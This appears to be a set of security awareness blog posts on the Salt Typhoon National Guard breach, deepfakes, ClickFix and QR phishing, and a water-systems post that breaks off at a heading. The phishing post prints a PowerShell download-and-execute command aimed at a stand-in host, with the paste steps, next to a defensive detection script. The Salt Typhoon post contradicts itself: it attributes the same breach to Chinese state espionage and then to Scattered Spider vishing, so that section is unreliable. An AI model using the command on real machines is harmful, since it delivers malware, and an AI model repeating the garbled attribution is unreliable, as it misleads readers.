Chinese Hackers Infiltrate U.S. National Guard Networks for Nine Months: The Salt Typhoon Breach

In March 2024, Chinese state-backed hackers known as “Salt Typhoon” began what would become a nine-month infiltration of a U.S. state’s Army National Guard network. This wasn’t a smash-and-grab operation targeting consumer data—it was a sophisticated intelligence gathering campaign that extracted network configurations, administrative credentials, and operational maps spanning all 50 states and four U.S. territories. The breach, which remained undetected until December 2024, represents one of the most strategically significant cyber espionage operations against American military infrastructure in recent memory. 

The Breach: What We Know

  • Between March and December 2024, Chinese state-backed hackers known as Salt Typhoon “extensively compromised” that state’s National Guard network.
    • Network maps & traffic data spanning every U.S. state + 4 territories 
    • Administrator credentials and internal network diagrams  
  • No immediate details on which state were confirmed, but the leak to Property of the People sparked nationwide alarm.

How It Happened: A People-Powered Breach

This wasn’t a brute-force hack; it was a classic case of social engineering. Attackers employed a technique known as vishing, targeting contact center staff via phone to extract credentials and bypass multi-factor authentication.

The culprits? Likely the notorious Scattered Spider group, known for sophisticated, human-focused attacks across airlines and payment systems.

Why It Matters to Every Business

This wasn’t just espionage; it was strategic pre-positioning aimed at sabotaging critical infrastructure should tensions escalate. But the real threat for organizations lies closer to home:

“Going forward, all U.S. forces must now assume their networks are compromised and will be degraded.”  

Salt Typhoon: More Than a Hacker

This cyber-threat actor has rapidly become one of China’s most persistent and dangerous digital weapons. In 2024 alone, Chinese-linked breach activity doubled. Salt Typhoon is part of a broader ecosystem (including “Volt Typhoon” and “Silk Typhoon”) that is well-equipped to exploit zero-day vulnerabilities in software, telecom infrastructure, and defense systems.

What This Reveals: National Security at Risk

  • Strategic Intelligence: Topological and network insights are a roadmap for future cyber or physical attacks. 
  • Systemic Risk: Gaps in National Guard security don’t stay local—they threaten every business that works with state-level agencies or handles sensitive data. 
  • Corporate Exposure: If government entities are breached, those of us relying on them, through third-party platforms, shared infrastructure, or supply chains, must question our digital trustworthiness.

What Businesses Can Do Now

Best practices and the actions that go with them:

  • Validate all vendors and partners: Ensure they follow cybersecurity frameworks like CISA or NIST.
  • Assume compromise: Monitor administrative logins, shadow IT, and unexpected IAM changes.
  • Train employees continuously: Mandated “vishing” simulations for front-desk, customer service, and IT.
  • Segment & limit access: Enforce least privilege and zero-trust across your network.
  • Stay aware: Watch breach reporting and monitor dark-web forums for stolen data.

The breach of a National Guard unit isn’t just national news, it’s proof that no network is truly secure, and that even “trusted” public systems can be painfully fragile. Business leaders must shift from reactive defense to proactive resilience, safeguarding every link in their digital chain. 

If Army Guard networks can be quietly infiltrated for nine months, are your systems next? 

The Deepfake Dilemma: Rising Threats and How to Stay Protected

Deepfakes, AI-generated audio, video, or images designed to mimic real people, have quickly evolved from experimental curiosities into dangerous tools for deception. As technology continues to advance, so does the ability for malicious actors to weaponize deepfakes for fraud, misinformation, and personal attacks. In 2025, the deepfake landscape presents serious challenges across personal, professional, and political arenas. 

How Deepfakes are Made

Deepfakes are created using artificial intelligence, specifically deep learning models like autoencoders or generative adversarial networks (GANs). The process starts by training these models on large datasets of photos and videos of a person, allowing the AI to learn facial expressions, movements, and voice patterns. Once trained, the model can generate realistic but fake content by swapping faces in videos or mimicking voices. After the initial creation, post-processing techniques help enhance realism, such as smoothing artifacts (noticeable errors like 4 or 6 fingers or unnatural twitches) and syncing lip movements. Common software used to make deepfakes includes DeepFaceLab, Faceswap, Avatarify, and voice cloning tools like Descript’s Overdub. While these tools can be used creatively in entertainment or education, they also raise serious concerns around misinformation and impersonation.  

This is an example of a deepfake side by side comparison.  

The Growing Impact of Deepfakes

Victims of deepfakes, particularly women and minors,* are increasingly targeted with explicit or defamatory content. These fabricated videos can cause severe emotional distress, social stigma, and career harm, even when the content is proven false. Criminals are also using deepfakes to impersonate executives and trick employees into transferring money or divulging sensitive information. A widely known deepfake scam happened last year, when criminals defrauded a company of approximately $25 million USD.

*Read more about why women and minors are targeted more than other demographics. 

Video conferencing tools and voice messaging platforms are now common channels for these scams, which can cause massive financial losses. In the political sphere, deepfakes of public figures are being used to spread false narratives and incite unrest. As these videos go viral on social media, they erode public trust, manipulate public opinion, and undermine democratic processes.  

Protecting Against Deepfake Threats

To protect against these threats, it is important to verify content before sharing. One quick way to check is looking at the URL. Authenticity should never be assumed. Always check for inconsistencies in movement, lighting, or speech patterns and cross-reference information with trusted news outlets or official sources. AI-powered detection tools can also be used to identify deepfakes, analyzing digital fingerprints, facial patterns, and audio signals for manipulation. Limiting personal exposure online is another effective measure. Reducing the availability of personal photos, videos, and voice recordings by adjusting privacy settings can help limit the data that deepfake creators rely on.  

It is important to understand the legal tools that are available as more states are introducing legislation to combat deepfakes. In an effort to defend against deepfakes, New Jersey passed legislation in April 2025 against “deceptive media made with artificial intelligence”. This is not long after California’s AB2655, which helps defend against deepfakes in the political setting.

Moving Forward in the Deepfake Era

Deepfakes will continue to improve in quality and accessibility, making detection and prevention more difficult. A combination of legal protections, public awareness, and evolving technology will be essential in managing this growing threat. Digital literacy and critical thinking are more important than ever. Understanding how deepfakes are made and used can empower individuals and organizations to better protect themselves and others from the harm they may cause.

The Rise of Advanced Phishing Scams and How to Stay Safe

Phishing attacks continue to evolve as cybercriminals develop new techniques to deceive users and steal sensitive information. One emerging method is ClickFix, a social engineering tactic that tricks users into executing malicious commands by disguising them as legitimate actions, such as CAPTCHA verifications or system fixes. Attackers use phishing emails and malicious ads to direct victims to deceptive websites, where clipboard manipulation convinces a victim to copy a command that runs a malicious script, often using built-in system tools like PowerShell or Command Prompt, to download and execute malware, steal credentials, or establish persistent access.  Recent campaigns have used ClickFix to distribute malware like Lumma Stealer, DarkGate, and remote access trojans. 

Another growing phishing scam is the QR code phishing attack, often referred to as “Quishing.” Cybercriminals embed QR codes in phishing emails, pretending to be from trusted sources like banks, delivery services, or corporate IT departments. When users scan these QR codes with their smartphones, they are redirected to fake login pages that steal their credentials. Since mobile devices do not always display full URLs, users may not realize they are on a malicious site until their information has already been compromised.

How to Stay Safe

With phishing attacks becoming more sophisticated, it is essential to take proactive steps to protect yourself and your organization. Here are a few recommendations:

    • Always verify the source of an email before clicking on links or scanning QR codes. If something seems suspicious, contact the sender through official channels. This can be done through emailing the person or service directly asking for confirmation or through another trusted form of communication, before acting. 
    • Do not run commands provided by unknown sources, even if they appear to be part of a system fix or security verification. For example, a command such as:
      powershell -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://malicious.com/script.ps1')"
      can be placed on the clipboard by a deceptive page and then run by the victim in three steps:

      1.   ⊞ + R (opens the Run dialog)
      2.   CTRL+V
      3.   Enter
    • Enable multi-factor authentication (MFA) on all accounts to add an extra layer of security against credential theft. Check out our guide on setting up 2FA (Two-Factor Authentication) for various email services.  
    • Keep software and security tools updated to detect and block phishing attempts before they cause harm. 
    • Educate employees and team members about common phishing tactics to reduce the risk of falling for social engineering scams. 
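
For defenders, the Win+R step leaves a trace: commands typed or pasted into the Run dialog are recorded per user under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU. The following is an added example, not part of the original article, that triages exported RunMRU values for commands shaped like the one above; the indicator names, the threshold and the sample values are assumptions constructed for illustration.

```python
import re

# Heuristics for Run-dialog (Win+R) commands of the kind ClickFix pages ask
# victims to paste. Indicator names and the threshold are assumptions made
# for this example, not a vendor rule set.
INDICATORS = {
    "script_host":    re.compile(r"^\s*(powershell|pwsh|cmd|mshta)(\.exe)?\b", re.I),
    "policy_bypass":  re.compile(r"-e(p|x|xec|xecutionpolicy)?\s+bypass", re.I),
    "download":       re.compile(r"downloadstring|downloadfile|invoke-webrequest"
                                 r"|invoke-restmethod|\b(iwr|irm|curl)\b", re.I),
    "in_memory_exec": re.compile(r"\biex\b|invoke-expression", re.I),
    "remote_url":     re.compile(r"https?://", re.I),
    "hidden_window":  re.compile(r"-w(indowstyle)?\s+h(idden)?\b", re.I),
}

def triage_runmru(values, threshold=3):
    """Return (value_name, command, hits) for entries scoring >= threshold."""
    flagged = []
    for name, data in values.items():
        if name == "MRUList":            # ordering string, not a command
            continue
        # The Run dialog stores each entry with a trailing "\1" marker.
        cmd = data[:-2] if data.endswith("\\1") else data
        hits = sorted(k for k, rx in INDICATORS.items() if rx.search(cmd))
        if len(hits) >= threshold:
            flagged.append((name, cmd, hits))
    return flagged

# Constructed sample of one user's RunMRU values. Entry "c" is the command
# quoted in the article; the others are ordinary administrative use.
SAMPLE_RUNMRU = {
    "MRUList": "dcba",
    "a": "cmd\\1",
    "b": "\\\\fileserver\\share\\1",
    "c": "powershell -exec bypass -c \"IEX (New-Object Net.WebClient)"
         ".DownloadString('http://malicious.com/script.ps1')\"\\1",
    "d": "powershell -File C:\\Scripts\\backup.ps1\\1",
}

if __name__ == "__main__":
    for name, cmd, hits in triage_runmru(SAMPLE_RUNMRU):
        print(f"RunMRU value {name!r}: {len(hits)} indicators {hits}\n  {cmd}")
```

Requiring several indicators together keeps a plain `cmd` or a scheduled-script launch from alerting, while a script host combined with a policy bypass, a download call and a remote URL in one Run-dialog entry is rarely legitimate.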

By staying informed and vigilant, individuals and businesses can significantly reduce the likelihood of becoming victims of phishing scams. The most effective way to avoid a scam is to ask yourself three questions: Is this urgent? Is this unexpected? Is this too good to be true? These three questions will help save you the time and stress of being a victim of a scam.

A Cyber Threat: US Water Systems Under Attack

California municipalities have been increasingly targeted by ransomware and malware attacks since the beginning of 2023, and while some attacks have been less serious, others have temporarily crippled municipalities and police departments.

Oakley California Ransomware Attack
